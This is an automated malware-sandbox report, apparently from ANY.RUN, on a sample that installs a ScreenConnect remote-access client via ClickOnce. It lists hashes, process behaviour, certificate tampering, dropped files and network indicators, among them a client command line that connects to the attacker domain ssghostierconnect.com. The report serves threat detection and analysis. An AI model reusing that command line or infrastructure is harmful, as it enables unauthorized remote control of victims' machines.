File name:

Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b

Full analysis: https://app.any.run/tasks/0843aec7-0213-4806-a362-e689839b4da3
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: May 16, 2025, 12:45:03
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
screenconnect
rat
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5:

51484F0C0F9854F9F74CA609569CE11B

SHA1:

DFA1C058AF0433DB147F759D206C5C57C0693A7E

SHA256:

B7B65DBD30AD4B73017275BF43F046B3EC0B76C1F55898E092FD5340FF9C2B7B

SSDEEP:

1536:lejLH3MVw8licIgWQog5Mzg+MoCdqQsWQcd69jPVfq7NKEH:8jLHcVw8licpWQog5Ms+f+l6xPVfqnH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    No malicious indicators.

  • SUSPICIOUS

    • Adds/modifies Windows certificates

      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • dfsvc.exe (PID: 7904)

    • Reads security settings of Internet Explorer

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)

    • Reads Internet Explorer settings

      • dfsvc.exe (PID: 7904)

    • Executable content was dropped or overwritten

      • dfsvc.exe (PID: 7904)

    • The process creates files with name similar to system file names

      • dfsvc.exe (PID: 7904)

    • Reads the date of Windows installation

      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • dfsvc.exe (PID: 7904)

    • Executes application which crashes

      • ScreenConnect.ClientService.exe (PID: 7320)

    • Connects to unusual port

      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • There is functionality for taking screenshot (YARA)

      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • Detects ScreenConnect RAT (YARA)

      • ScreenConnect.WindowsClient.exe (PID: 6044)

  • INFO

    • Reads the computer name

      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)

    • Reads the machine GUID from the registry

      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • dfsvc.exe (PID: 7904)
      • ScreenConnect.ClientService.exe (PID: 7320)
      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • Checks supported languages

      • dfsvc.exe (PID: 7904)
      • Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe (PID: 7864)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • ScreenConnect.ClientService.exe (PID: 7320)

    • Reads Environment values

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • Checks proxy server information

      • dfsvc.exe (PID: 7904)
      • slui.exe (PID: 2692)
      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • Disables trace logs

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)

    • Process checks whether UAC notifications are on

      • dfsvc.exe (PID: 7904)

    • Creates files or folders in the user directory

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
      • WerFault.exe (PID: 1164)

    • Create files in a temporary directory

      • dfsvc.exe (PID: 7904)

    • Reads the software policy settings

      • dfsvc.exe (PID: 7904)
      • slui.exe (PID: 2692)

    • Process checks computer location settings

      • dfsvc.exe (PID: 7904)
      • ScreenConnect.WindowsClient.exe (PID: 6044)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:11:18 19:55:37+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.33
CodeSize: 40448
InitializedDataSize: 32768
UninitializedDataSize: -
EntryPoint: 0x14ba
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
132
Monitored processes
6
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe no specs dfsvc.exe #SCREENCONNECT screenconnect.windowsclient.exe screenconnect.clientservice.exe werfault.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1164C:\WINDOWS\SysWOW64\WerFault.exe -u -p 7320 -s 1248C:\Windows\SysWOW64\WerFault.exeScreenConnect.ClientService.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Problem Reporting
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
2692C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6044"C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.WindowsClient.exe" C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.WindowsClient.exe
dfsvc.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\9nagmghp.qmj\pjclx5qj.a3r\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
7320"C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.ClientService.exe" "?y=Guest&h=ssghostierconnect.com&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQBVXsSEc%2bx9uXD3C%2f7hA6k%2bCkYq8qNt9ddXTDuk6xtcDXcigKgagdDrv%2fcdVObs%2b5PsIEqa3J7G2KVNlw%2fruJmp5gWKLUA7CGK0M2xYP%2fnHrh8PGKb6APgX8%2bMmK%2fRI%2fuG1ObyHzrZSA2zDxqMWtbhBTbrYOR9GzyZRtT2sHBbUlx41DAcKHlRcqgqrm7UWwNY1mXMg1RfS2uCkTVjdU3GL7AKxo9LZAF%2bNZ31xMPej0IfTdjxJIuBFFPQhiLUl3MrrnM%2bcDzOJ4R5qzkEDJux1InHPO4447uQgY2C%2fpH9XXbyUJCVvgFFCPS5LSQJiQ7CvgPW3fKiAsEahrr56vu2y&r=&i=" "5"C:\Users\admin\AppData\Local\Apps\2.0\9NAGMGHP.QMJ\PJCLX5QJ.A3R\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\ScreenConnect.ClientService.exe
ScreenConnect.WindowsClient.exe
User:
admin
Integrity Level:
HIGH
Exit code:
3762504530
Version:
23.2.9.8466
Modules
Images
c:\users\admin\appdata\local\apps\2.0\9nagmghp.qmj\pjclx5qj.a3r\scre..tion_25b0fbb6ef7eb094_0017.0002_bac79e7ade954b90\screenconnect.clientservice.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\shlwapi.dll
7864"C:\Users\admin\Desktop\Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe" C:\Users\admin\Desktop\Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
1
Modules
Images
c:\users\admin\desktop\sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\crypt32.dll
7904"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ClickOnce
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework64\v4.0.30319\dfsvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
12 072
Read events
11 868
Write events
177
Delete events
27

Modification events

(PID) Process:(7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:7B0F360B775F76C94A12CA48445AA2D2A875701C
Value:
(PID) Process:(7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Operation:writeName:Blob
Value:
0300000001000000140000007B0F360B775F76C94A12CA48445AA2D2A875701C2000000001000000B4060000308206B030820498A003020102021008AD40B260D29C4C9F5ECDA9BD93AED9300D06092A864886F70D01010C05003062310B300906035504061302555331153013060355040A130C446967694365727420496E6331193017060355040B13107777772E64696769636572742E636F6D3121301F060355040313184469676943657274205472757374656420526F6F74204734301E170D3231303432393030303030305A170D3336303432383233353935395A3069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E6720525341343039362053484133383420323032312043413130820222300D06092A864886F70D01010105000382020F003082020A0282020100D5B42F42D028AD78B75DD539591BB18842F5338CEB3D819770C5BBC48526309FA48E68D85CF5EB342407E14B4FD37843F417D71EDAF9D2D5671A524F0EA157FC8899C191CC81033E4D702464B38DE2087D347D4C8057126B439A99F2C53B1FF2EFCB475A13A64CB3012025F310D38BB2FB08F08AE09D09C065A7FA98804935873D5119E8902178452EA19F2CE118C21ACCC5EE93497042328FFBC6EA1CF3656891A24D4C8211485268DE10BD14575DE8181365C57FB24F852C48A4568435D6F92E9CAA0015D137FE1A0694C27CC8EA1B32E6CAC2F4A7A3030E74A5AF39B6AB6012E3E8D6B9F731E1DCADE418A0D8C1234747B3A10F6EA3AB6D9806831BB76A672DD2BD441A9210818FB03B09D7C79B325AC2FF6A60548B49C193EDE1B45CE06FEB26F98CD5B2F93810E6EACE91F5BED3FB6F9361345CBC93452883362A66285FB073CE8B262506B283D45CF615194CED62E05E33F2E8E8EC0AA7B0032B91B23679BEF7AD081E75A665CCBBE34850F377911AFEDB50A246C8615898F57C02163C8328AD3986ECD4B70D53D0F847E675308DEC30937614A65B4B5D74614D3F129176DEBF58CB72102941F0D5C56D267668114113589ADC262B01F4894D59DB78CF814A3E40475FC98150738510232159608A6454C1CC211AE838197C661CCD78384530994FFF634F4CBBAA0D0853417C583D47B3FAB6EC8C320902CC6C3C0C56110203010001A38201593082015530120603551D130101FF040830060101FF020100301D0603551D0E041604146837E0EBB63BF85F1186FBFE617B088865F44E42301F0603551D23041830168014ECD7E382D2715D644CDF2E673FE7BA98AE1C0F4F300E0603551D0F0101FF04040302018630130603551D25040C300A06082B06010505070303307706082B06010505070101046B3069302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D304106082B060105050730028635687474703A2F2F636163657274732E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63727430430603551D1F043C303A3038A036A0348632687474703A2F2F63726C332E64696769636572742E636F6D2F446967694365727454727573746564526F6F7447342E63726C301C0603551D20041530133007060567810C01033008060667810C010401300D06092A864886F70D01010C050003820201003A23443D8D0876EE8FBC3A99D356E0021AA5F84834F32CB6E67466F79472B100CAAF6C302713129E90449F4BFD9EA37C26D537BC3A5D486D95D53F49F427BB16814550FD9CBDB685E0767E3771CB22F75AAA90CFF5936AE3EB20D1D55079889A8A8AC1B6BDA148187EDCD8801A111918CD61998156F6C9E376E7C4E41B5F43F83E94FF76393D9ED499CF4ADD28EB5F26A1955848D51AFED7273FFD90D17686DD1CB0605CF30DA8EEE089A1BD39E1384EDA6EBB369DFBE521535AC3CAE96AF1A23EDB43B833C84F38149299F5DDCE546DD95D02141F40337C03E295B2C221757352CB46D8C4341CA2A54B8DCD6F76372C853F1ACE26E918BE9007B0437F9588208270F0CCCAEFFD29355C1F893855F7378A8B09A1CB0BE9311AFF2E195C3971E1BE9CA70A06D62667B792E64E5FDE7AAC49CF2EA47492ADDB3CA49C861FE3C1561B2B23FF8FB5EA887B706BE6A0BAFD3A3F45A6C4E81691528B41C048844B964DAB4440E38DF01528CEEDF11856072A2F10C40C08643C338FAE288C3CCB8F880B0DBF3BF4CE1E7B8EEFB5EBCBB7F07713E6E7283FAC12AEA52F226C41F9825C1566CC6C0ECAC586C3F626330C074BA0D307026A6A4030484B34A85120BBAD1B8508E2590D6DCA05502BEA4A1C9EA5FDA0A71F0674E7F2D65290FDAF854821F9573BB49C03ED8645F4B4616EBF68E2266086EAC8AFA9FE941DE7631B3A8656784E
(PID) Process:(7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates
Operation:delete valueName:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Value:
(PID) Process:(7864) Sigmanly_b7b65dbd30ad4b73017275bf43f046b3ec0b76c1f55898e092fd5340ff9c2b7b.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Operation:writeName:Blob
Value:
0300000001000000140000004C2272FBA7A7380F55E2A424E9E624AEE1C145792000000001000000640700003082076030820548A00302010202100B9360051BCCF66642998998D5BA97CE300D06092A864886F70D01010B05003069310B300906035504061302555331173015060355040A130E44696769436572742C20496E632E3141303F060355040313384469676943657274205472757374656420473420436F6465205369676E696E67205253413430393620534841333834203230323120434131301E170D3232303831373030303030305A170D3235303831353233353935395A3065310B30090603550406130255533110300E06035504081307466C6F72696461310E300C0603550407130554616D706131193017060355040A1310436F6E6E656374776973652C204C4C433119301706035504031310436F6E6E656374776973652C204C4C4330820222300D06092A864886F70D01010105000382020F003082020A0282020100EC489826D08D2C6DE21B3CD3676DB1E0E50CB1FF75FF564E9741F9574AA3640AA8297294A05B4DB68ABD0760B6B05B50CE92FF42A4E390BE776A43E9961C722F6B3A4D5C880BCC6A61B4026F9137D36B2B7E9B86055876B9FA860DBCB164FE7F4B5B9DE4799AE4E02DC1F0BEE01E5D032933A2827388F8DB0B482E76C441B1BD50909EF2023E1FB62196C994CE052266B28CD89253E6416044133139764DB5FC45702529536BF82C775F9EC81FA27DC409530325F40CDEF95B81B9CE0D42791CEE72E7BD1B36C257B52257C65A28970E457513989434BFC239E2992B193E1B3CC3F11CCDD1D26D4EC9845099AB913906A42069AF999C0071169B45A2EA1AA666F1904E8ACB05E1823A359A291FD46B4EF7AED5935BB6AB17EBF077210726930C90F01761D6544A94E8FA614CC41D817EEC734B1C3D3AFB7C58FB256F0C09EDC1459BDDBFF9940ED1958570265D67AF79A9B6A16AFFD70FC6328C9810D5DC186E39AF6FBCAD49A270F237E6BCD5DE0BC014BC3179CD79776591340311A42CA94F33416C2E01B59BD1D71DE86ACE6716BC90B2D7695D155039AA08FBAC19A4D93FB784230A20A485287A16355645FC09142C602D140FA046B7BFD75328184FF7BDF8F9E0D65E6201C8D242931047F59BD328AC353777CCEFA60408887B84FC3631301463461A1D73C0B5CC74D6D82905DDF923BDBAB027A311CC38D3FA16F639A50203010001A382020630820202301F0603551D230418301680146837E0EBB63BF85F1186FBFE617B088865F44E42301D0603551D0E04160414338CE10A6E06D9C6ED0BC6CAE736CEFB8188646A300E0603551D0F0101FF04040302078030130603551D25040C300A06082B060105050703033081B50603551D1F0481AD3081AA3053A051A04F864D687474703A2F2F63726C332E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C3053A051A04F864D687474703A2F2F63726C342E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E63726C303E0603551D20043730353033060667810C0104013029302706082B06010505070201161B687474703A2F2F7777772E64696769636572742E636F6D2F43505330819406082B06010505070101048187308184302406082B060105050730018618687474703A2F2F6F6373702E64696769636572742E636F6D305C06082B060105050730028650687474703A2F2F636163657274732E64696769636572742E636F6D2F4469676943657274547275737465644734436F64655369676E696E6752534134303936534841333834323032314341312E637274300C0603551D130101FF04023000300D06092A864886F70D01010B050003820201000AD79F00CF4984864C8981ECCE8718AA875647F6A74608C968E16568C7AA9D711ED7341676038067F01330C91621B27A2A8894C4108C268162A31F13F9757A7D6BB3C6F19BF27C3A29896D712D85873627D827CD6471761444FABF1D31E903F791143C5B4CE5E7444AACBA36D759AEBA3069D195226755CBC675AA747F77596C53C96E083C45BBA24479D6845EEA9F2B28BA29B4DCF0BCF14AA4CE176C24E2C1B8FEC3EE16E1C086DB6FDA97388859E83BE65C03F701395B78B842C6DD1533EF642CCA6FE50F6337D3F2DFEDD8B28F2B28E0C98EDD2151392E7CC75489F48859F1DE14C81B306EB50EED7BB78BE30EAADA76767C4CA523A11EEC5A2372D6122926AB1801A6A6778E9504791487EE47D4577154988802070F80FC535957658F954CD083546C5AFB5A6567B6761275F5DB20F70AB86FEEF94C7CFC65369D325121B69A82399BC7DC1962416F0F05CF1EEE64D495A3527E464E2C68DA0187093F97B673E43DDDBCC067E00713F1565FCFF8C3772D44B40A04E600644F22A990345F9A6B5B52963E82C81A0CE91D43A230F67B37D8DEBDA40EA3D59D305E18ADC1976516C12A8BA2BCA24143B12E9527B4DCA58872AA9B3A8C6AC563FC2DC02BF51BE889516D35A4BA9D062417B5BDCC50BA945FAE26B60D6AEC03984798A6A21D3FF793CC0849E81ED55B8027411C50DB776AE8FEEF2FDC2DAFB04345261DEDC054
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
OYH1V78WB4B4JOVBAB8P4DY3
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete valueName:ComponentStore_RandomString
Value:
OYH1V78WB4B4JOVBAB8P4DY3
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:delete keyName:(default)
Value:
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0
Operation:writeName:ComponentStore_RandomString
Value:
9NAGMGHPQMJPJCLX5QJA3RW5
(PID) Process:(7904) dfsvc.exeKey:HKEY_CLASSES_ROOT\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager
Operation:writeName:StateStore_RandomString
Value:
1E9NOLQPTM1X1TB4PZ9592LE
(PID) Process:(7904) dfsvc.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\dfsvc_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
Executable files
14
Suspicious files
20
Text files
30
Unknown types
1

Dropped files

PID
Process
Filename
Type
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.WindowsClient.exe.manifestxml
MD5:9165412EE08839B9702BD4971864A133
SHA256:6BB1C1AA5663AD33EDA2256037DA8E7439502C206D4C0047270A2FD1F006BB50
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.Core.dllexecutable
MD5:6C5D0928642BF37CEED295B984E05BE2
SHA256:3B0C45370CA9295881EF5E9D14402C42DFB45803F54D542E6A7E595A05F365A1
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.WindowsClient.exe.configxml
MD5:728175E20FFBCEB46760BB5E1112F38B
SHA256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.Windows.dllexecutable
MD5:254D64388C6C52228D7A921960A03F6B
SHA256:05E78416A344F74095E36FF14BAA719867E9E163E1AE9A96C29DF8615748B0AE
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.WindowsClient.exe:Zone.Identifiertext
MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
SHA256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.Windows.dll.genmanxml
MD5:9A91308C9B52B96C012F0C14581D4445
SHA256:293E2EAFED2E158BAA0E2C7C855AD68618B7FEF29FBC799AA0BDF551E2C93300
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.Client.dllexecutable
MD5:32D230704C43F4BF811CE214FA23700B
SHA256:3B0CD76C1D949D6D6E4073C73E637C531BAC18827F9EC02A6BE6C5E6BBCFE368
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\GWRY69DK.ZBK\L64A83RX.D31\ScreenConnect.ClientService.dll.genmanxml
MD5:5FF58A84F45FB37155AD9506016E01E0
SHA256:19793A0F7348C3AD051E370D3AF533FE2D105B2187EAEAB9BCE49BE9AC77C8D7
7904dfsvc.exeC:\Users\admin\AppData\Local\Temp\Deployment\Q9MVEXJ2.CEY\Z3AW0BVV.8PG.applicationxml
MD5:A51027818F34FC5ACA94AF3975E82112
SHA256:9BA8267A16A16228FF01A9B3AA5648B1EF4D8A99326DFCDCBEB3D20BFDC7E958
7904dfsvc.exeC:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\932a2db58c237abd381d22df4c63a04a_bb926e54-e3ca-40fd-ae90-2764341e7792binary
MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
SHA256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
54
DNS requests
16
Threats
8

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7904
dfsvc.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxXWRM3y5nP%2Be6mK4cD08CEAitQLJg0pxMn17Nqb2Trtk%3D
unknown
whitelisted
7904
dfsvc.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSRXerF0eFeSWRripTgTkcJWMm7iQQUaDfg67Y7%2BF8Rhvv%2BYXsIiGX0TkICEAuTYAUbzPZmQpmJmNW6l84%3D
unknown
whitelisted
4688
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
23.216.77.39:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
unknown
whitelisted
7904
dfsvc.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEA6bGI750C3n79tQ4ghAGFo%3D
unknown
whitelisted
4688
SIHClient.exe
GET
200
23.216.77.39:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
23.216.77.39:80
http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl
unknown
whitelisted
4688
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
40.126.32.74:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
40.126.32.74:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7904
dfsvc.exe
23.95.173.124:443
ssghostierconnect.com
AS-COLOCROSSING
US
unknown
7904
dfsvc.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2112
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
google.com
  • 172.217.16.206
whitelisted
login.live.com
  • 40.126.32.74
  • 20.190.160.130
  • 40.126.32.76
  • 20.190.160.128
  • 40.126.32.138
  • 20.190.160.5
  • 40.126.32.136
  • 40.126.32.68
whitelisted
ssghostierconnect.com
  • 23.95.173.124
malicious
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
